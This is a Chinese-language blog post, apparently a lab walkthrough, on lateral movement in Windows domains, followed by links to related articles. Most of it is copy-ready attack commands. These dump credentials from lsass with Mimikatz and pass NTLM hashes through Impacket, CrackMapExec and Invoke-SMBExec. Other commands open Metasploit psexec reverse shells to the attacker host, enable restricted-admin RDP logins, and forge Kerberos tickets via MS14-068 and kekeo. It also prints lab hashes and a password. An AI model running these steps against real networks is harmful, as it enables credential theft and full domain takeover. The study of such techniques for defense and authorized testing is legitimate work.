内网横向——常见系统传递攻击(1)

于 2024-08-02 21:18:40 发布
阅读量983 收藏 24
点赞数 21
分类专栏: 内网渗透 文章标签: 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140781984
版权

文章目录


网络拓扑:
在这里插入图片描述
攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

一、哈希传递

哈希传递(Pass the Hash,PTH)时一直针对NTLM协议的攻击技术,在NTLM身份认证的第三步生成response时,客户端直接使用用户的NTLM哈希值进行计算,用户的明文密码并不参与整个认证过程。也就是说,在windows系统中只使用用户哈希值队访问资源的用户身份进行认证。

1.1 利用Mimikatz进行PTH

Mimikatz中内置了哈希传递的功能,需要本地管理员权限
1、在win 7上尝试不输入密码与域控进行IPC连接。此时,windows会默认使用当前用户的NTLM Hash进行NTLM网络认证,win 7的本地管理员不是域用户,显示是连接不上域控的。

在这里插入图片描述
2、将Mimikatz上传到跳板机win 7 并执行下面的命令:

# 抓取用户hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

获取到域管理员NTLM hash为e037bc75e7afd68ec61c46253bd03f9b

在这里插入图片描述

上述使用mimikatz.exe,本质上是在线读取lsass.exe内存中保存的用户名和密码。如果机器关机后,只有本地管理员登录,mimikatz.exe就只能读取到本地管理员的账户和密码。

2、利用抓取到的域管理员的NTLM hash进行hash传递,在win7上执行:

# hash传递攻击
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:god /ntlm:e037bc75e7afd68ec61c46253bd03f9b /run:whoami" exit

默认情况会弹出cmd命令行,在该命令行下可以使用IPC连接去查看域控C盘根目录。用自己创建的cmd进程则不可以。

在这里插入图片描述

1.2 利用Impacket进行PTH

Impacket项目中具备远执行功能的几个脚本都支持哈希传递,例如smbexec.pywmiexec.pypsexec.py

kali上执行

impacket-smbexec -hashes 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b god/administrator@192.168.52.138
# impacket-smbexec -hashes LM Hash:NTLM Hash <domain>/<username>@IP "command"

在这里插入图片描述

impacket-wmiexec -hashes 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b god/administrator@192.168.52.138
# impacket-wmiexec -hashes LM Hash:NTLM Hash <domain>/<username>@IP "command"

在这里插入图片描述
win 7上执行

impacket-smbexec -hashes 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b god/administrator@192.168.52.138
# impacket-smbexec -hashes LM Hash:NTLM Hash <domain>/<username>@IP "command"

在这里插入图片描述

wmiexec.exe -hashes 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b god/administrator@192.168.52.138
# impacket-wmiexec -hashes LM Hash:NTLM Hash <domain>/<username>@IP "command"

在这里插入图片描述

1.3 使用crackmapexec进行PTH

crackmapexec smb 192.168.52.138 -u administrator -H e037bc75e7afd68ec61c46253bd03f9b -d god -x whoami
# crackmapexec smb <ip> -u administrator -H <ntlm hash> -d <domain> -x <command>
# <ip>:可以是单个IP也可以是IP段
# -u:指定用户名
# -H:指定NTLM Hash
# -d:指定域
# -x:执行系统命令
# --exec-method:smbexec(system权限)、wmiexec(默认,用户权限)、atexec(system权限)

在这里插入图片描述

1.4 使用PowerShell

在win 7上远程让靶机(192.168.52.138)运行反弹shell。Invoke-TheHash项目是一个基于.Net TCPClient,通过把 NTLM 哈希传递给 NTLMv2 身份验证协议来进行身份验证的攻击套件,且执行时客户端不需要本地管理员权限。

Invoke-SMBExec -Target 192.168.52.138 -Domain god -Username administrator -Hash 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b -Command "C:\Users\liukaifeng01\Desktop\reverse_shell.exe" -verbose

在这里插入图片描述
在这里插入图片描述

1.5 使用MSF进行哈希传递

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.1 # Kali IP
set LPORT 7778
set RHOSTS 192.168.52.138 # 目标IP
set SMBUser administrator # 用户名
set SMBDomain god # 域名
set SMBPass 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b
run

在这里插入图片描述

域名写错了,似乎也能登上去。

1.6 利用哈希传递登录远程桌面

哈希传递不仅可以在远程主机上执行命令,在特定条件下还可以建立远程桌面连接。需要具备以下条件:

  • 远程主机开启“受限管理员”模式;
  • 用于登录远程桌面的用户位于远程主机的管理员组中;
  • 目标用户的hash。

windows server 2012 R2及以上的版本采用了新版RDP,支持受限管理员模式(Restricted Admin Mode)。开启该模式后,测试人员可以通过哈希传递直接登录远程桌面,不需要明文密码。受限管理员模式在windows 8.1和windows server 2012 r2上默认开启

1、执行以下命令,查看目标主机是否开启受限管理员模式。

# 查看主机是否开启“受限管理员”模式
# 若值为0,则说明启动;若为1,则说明未开启。
reg query "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin

2、在windows server 2012 R2及以上的主机可以使用下面的命令手动开启。

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

3、若远程主机开启了受限管理员模式,则可以通过mimikatz进行利用。

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:xxxx "/run:mstsc.exe /restrictedadmin"

大致原理是:哈希传递成功后执行mstsc.exe /restrictedadmin,以受限管理员模式运行远程桌面客户端,此时不需要用户名密码即可成功登录远程桌面。

注意:受限管理员模式只对管理员组中的用户有效,如果获取到的用户属于远程桌面用户组,就无法通过哈希传递进行登录。

二、票据传递

票据传递(pass the ticket,PTT)是一种使用Kerberos票据代替明文密码或NTLM hashde的攻击方法。这种攻击方式可以用Kerberos票据进行内网渗透,不需要管理员权限,最常见的就是黄金票据白银票据

2.1 MS14-068漏洞

MS14-068是一个windows漏洞,位于域控制器的密钥分发中心的kdcsvc.dll。它允许经过身份验证的用户在其kerberos票据中插入任意PAC,并且可能允许攻击者将未授权的域用户账号的权限提升为域管理员权限。攻击者可以通过构造特定的请求包来达到提升权限的目的。

该漏洞的利用条件:

  • 获取域普通用户的账号密码;
  • 获取域普通用户的SID;
  • 服务器未安装KB3011780补丁。

下面的实验是在跳板机Win 7上进行的,使用普通域用户账号登录。

1、首先在域控上创建一个普通域用户,然后在win 7上用普通域用户登录。在域god.org中添加一个test用户。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2、在域控上,查看系统是否安装KB3011780补丁,本环境下,域控没有安装相应的补丁。

systeminfo # 查看系统信息,尤其是补丁情况

在这里插入图片描述
3、在win 7上,获取域用户SID。

whoami /all # 查看当前用户的SID
wmic useraccount get name,sid # 查看所有用户的SID

在这里插入图片描述
在这里插入图片描述

4、创建票据之前需要清除win7系统内票据。

mimikatz.exe "kerberos::purge" exit # 清除系统内票据

# 查看系统内存中的票据
kerberos::purge # mimikatz中使用
klist # 直接在命令行中用

在这里插入图片描述

5、在win 7上,使用ms14-068.exe生成域管理员的票据

ms14-068.exe -u administrator@god.org -p hongrisec@2024. -s S-1-5-21-2952760202-1353902439-2381784089-1109 -d 192.168.52.138
# -u:用来指定域用户@域名,这里是administrator用户
# -p:用来指定域用户密码,administrator用户的密码
# -s:当前域用户SID,域用户god\test的SID
# -d:用来指定域控IP

在这里插入图片描述
6、在win 7上,使用mimikatz注入内存

kerberos::ptc TGT_administrator@god.org.ccache

在这里插入图片描述
7、在win 7上,验证权限

dir \\owa.god.org\c$ # 查看域控C盘下的文件
psexec64.exe \\owa.god.org cmd.exe # 拿到域控的shell
# IP访问不行就用域名

在这里插入图片描述
在这里插入图片描述

2.2 使用kekeo进行票据传递

kekeo是一款开源工具,主要用来进行票据传递、S4U2约束委派滥用等。如果想使用kekeo进行票据传递,需要域名、用户名、用户哈希

1、win7上使用本地管理员用户登录,并获取域管理员的NTLM hash

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
#

在这里插入图片描述

2、在win7上清除系统内存中的票据

mimikatz.exe "kerberos::purge" exit # 清除票据
klist # 查看系统内存中的票据

在这里插入图片描述

3、在win7上生成票据

kekeo.exe "tgt::ask /user:administrator /domain:god.org /ntlm:xxxxx"

在这里插入图片描述
4、在win 7上使用mimikatz将票据导入内存。

mimikatz.exe "kerberos::ptt <票据路径>" exit
klist # 查看票据是否注入成功

在这里插入图片描述
在这里插入图片描述
5、票据传递

dir \\owa.god.org\c$

在这里插入图片描述

可以看到net user中看不到已建立的连接,但是就是可以查看靶机C盘下的目录。

PT_silver
关注
  • 21
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Frp内网穿透——frps服务端部署
01-20
由于现在IPv4地址的短缺,在国内不可能每个设备都会分配到一个公网IP,因此从公网中访问自己的私有设备向来是一件难事儿。本次带大家了解一下frp内网...1.因为frp的原理是利用服务端(所准备的具有公网IP的服务器)进
内网渗透——横向移动
LainWith的博客
10-09 2433
目录环境利用Windows计划任务【借助明文账密】利用 at 建立连接利用 schtasks 建立连接哈希传递攻击哈希传递攻击适用情况知识背景PTH漏洞原理实操PTKPTT——MS14-068方式1:使用mimikatz方式2:使用kekeo方式3:利用本地票据(需管理员权限)Impacket中的Atexec【支持明文&哈希】其他协议——SMB服务利用使用psexec使用smbexec【支持明文&哈希】其他协议——WMI服务利用【支持明文&哈希】1. 自带WMIC命令,明文传递,无
域渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 2422
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。
内网渗透——哈希传递
来日可期的博客
10-09 1290
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
内网渗透 - 哈希传递攻击
LuckySec
06-06 2416
内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击攻击者不需要花时间破解密码哈希值来获取明文密码
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1611
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
[内网渗透]—票据传递
Sentiment的博客
12-08 810
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
游走于内网之后——工控安全那些事儿.pdf
08-08
工控安全的防护措施迫在眉睫,因为攻击工控系统的方法多样,攻击途径包括对SCADA系统Web访问入口的攻击、dll劫持、ajax攻击以及对PLC的攻击攻击者可能会利用SCADA系统中Web服务器的目录遍历漏洞,或者通过特定的...
032-内网横向移动学习备忘录1
08-04
1 . 1 扩 展 图 1 . 2 络 环 境 1 . 3 简 述 2 . 1 利 条 件 2 . 2 利 式 2 . 3 I P C 相 关 的 命 令 3
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 ...
AnyEiP企业内网办公系统
08-14
AnyEiP是一个以ASP+EasyUI+SQLServer进行开发的开源的企业内网办公系统。 部署简单,使用WindowsXP以及以上的系统,就能轻松部署。 如果你是中小企业,在内网就更合适。 AnyEiP使用合适的j
域渗透之Hash传递攻击
weixin_65550121的博客
12-08 989
哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统攻击者无须通过解密hash值来获取明文密码。因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。虽然哈希传递攻击可以在Linux,Unix和其他平台上发生,但它们在windows系统上最普遍。
PTH哈希传递攻击
最新发布
Y22Lee的博客
05-23 954
PTH(Pass The Hash),中文叫哈希传递攻击,在NTLM和Kerberos认证中,都需要用到用户的NTLM-Hash值进行加密认证,所以我们知道了对方用户的NTLN-Hash值之后就可以使用PTH进行认证。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 1714
内网环境下的横向移动总结
PTT(pass the ticket)票据传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
11-03 2151
PTT票据传递攻击,(PTT)是一种使用Kerberos票据代替明文密码或NTLM哈希的方法。PTH基于NTLM认证进行攻击,而PTT基于kerberos协议进行攻击票据传递攻击,目的是伪造、窃取凭据提升权限。
hash传递攻击
qq_58000413的博客
06-05 781
Pass the hash也就是Hash传递攻击,简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。开启445端口开启ipc$共享。
内网安全:PTH PTK PTT
qq_61553520的博客
01-28 1567
​​​​​​​。
内网渗透(哈希传递)
xy_wjyjw的博客
11-28 1157
哈希传递攻击是由于局域网内有多台主机存在相同密码造成的,绕过ntlm认证。
内网穿透——frp应用
09-16
frp是一款功能强大的内网穿透软件,它可以使处于内网或防火墙后的设备对外界提供服务。通过frp,你可以在公网中访问你的私有设备,例如远程桌面、远程文件和SSH等。frp可以通过反向代理的方式来实现内网穿透,它支持HTTP、HTTPS、TCP和UDP等协议。 具体来说,frp的使用分为服务端和客户端两部分。首先,在服务端和客户端分别安装frp。然后,配置服务端和客户端的frpc.ini文件,根据需要追加规则。在配置完成后,你可以先在局域网内进行测试,确保相关功能的正常使用。在内网调试通过后,再使用frp进行内网穿透测试。 总结一下,通过frp的内网穿透功能,你可以轻松地实现在公网中访问你的私有设备。请确保在使用frp进行内网穿透之前,先在局域网内测试好相关功能的正常使用,并配置好可能会影响的防火墙等内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值